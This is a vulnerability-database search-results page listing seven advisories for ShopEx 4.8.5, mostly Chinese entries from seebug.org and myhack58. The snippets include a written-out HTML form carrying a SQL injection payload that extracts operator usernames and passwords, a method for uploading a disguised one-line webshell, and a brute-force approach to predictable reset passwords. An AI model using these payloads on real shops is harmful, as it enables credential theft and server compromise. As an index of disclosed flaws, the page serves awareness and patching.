Lucene search
+L

7 matches found

seebug.org
seebug.org
added 2013/08/29 12:0 a.m.15 views

ShopEx 4.8.5 /core/api/payment/2.0/api_b2b_2_0_payment.php SQL注入漏洞

No description provided by source...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2013/08/28 12:0 a.m.13 views

ShopEx 4.8.5 /core/api/shipping/2.0/api_b2b_2_0_region.php SQL注入漏洞

No description provided by source...

7.1AI score
Exploits0
myhack58
myhack58
added 2013/08/19 12:0 a.m.32 views

shopex 4.8.5 api. php injection vulnerability 0day exp-vulnerability warning-the black bar safety net

form method='post' action='http://www.webshell.cc/api.php?act=searchdlytype&apiversion=1.0' columns:input type='text' value='1,2,SELECT concatusername,0x7c,userpass FROM sdboperators limit 0,1 as name' name='columns' style='width:8 0%'/br / input type='submit' value='submit' /br / /form script...

0.7AI score
Exploits0
seebug.org
seebug.org
added 2012/11/22 12:0 a.m.29 views

SHOPEX 4.8.5后台任意上传获取webshell

简要描述: SHOPEX 4.8.5后台任意上传获取webshell,藏了很久了 发了吧 详细说明: SHOPEX 4.8.5后台任意上传获取webshell,本地构造GIF89欺骗头文件一句话木马,上传并替换plugins下的PHP文件原文件自动备份,导致获取WEBSHELL 漏洞证明:...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2012/06/29 12:0 a.m.25 views

shopex 4.8.5 /core/model_v5/trading/mdl.goods.php SQL注入漏洞

No description provided by source...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2012/06/21 12:0 a.m.52 views

SHOPEX 4.8.5 注入漏洞以及后台拿SHELL

简要描述: SHOPEX 4.8.5 注入漏洞以及后台拿SHELL shopex很久没有更新了啊亲,非得每次出漏洞了才更新一下下吗? wooyun提示:漏洞在上报乌云之前已经在外界披露,请紧急处理 详细说明: SHOPEX 4.8.5 注入漏洞以及后台拿SHELL 漏洞文件: 漏洞核心函数 \core\modelv5\trading\mdl.goods.php 漏洞代码: None 拿shell方法…. 第一步 页面管理 修改模版 然后选一个XML编辑 开始用 live http 抓包 你们懂的 然后把第一个POST包给抓出来 然后改包 包要这么改 我研究了半天 尼玛的菊花红...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2011/10/14 12:0 a.m.13 views

shopex 4.8.5密码取回处新生成密码可预测漏洞

在shopex 4.8.5中,密码取回没有使用发送激活链接到邮箱的方式,而是直接生成一个新的密码发送到用户邮箱中。这个设计本身就不够安全,新生成的用户密码实际上就是取了当前时间 microtime 的md5值的前6位。 但PHP 中microtime的值除了当前服务器的秒数外,还有微秒数,比如: 0.55452100 1315562338 微妙数的变化范围在0.000000 -- 0.999999 之间,一般来说,服务器的时间可以通过HTTP返回头的DATE字段来获取,因此我们只需要遍历这1000000可能值即可。...

7.1AI score
Exploits0
Rows per page
Query Builder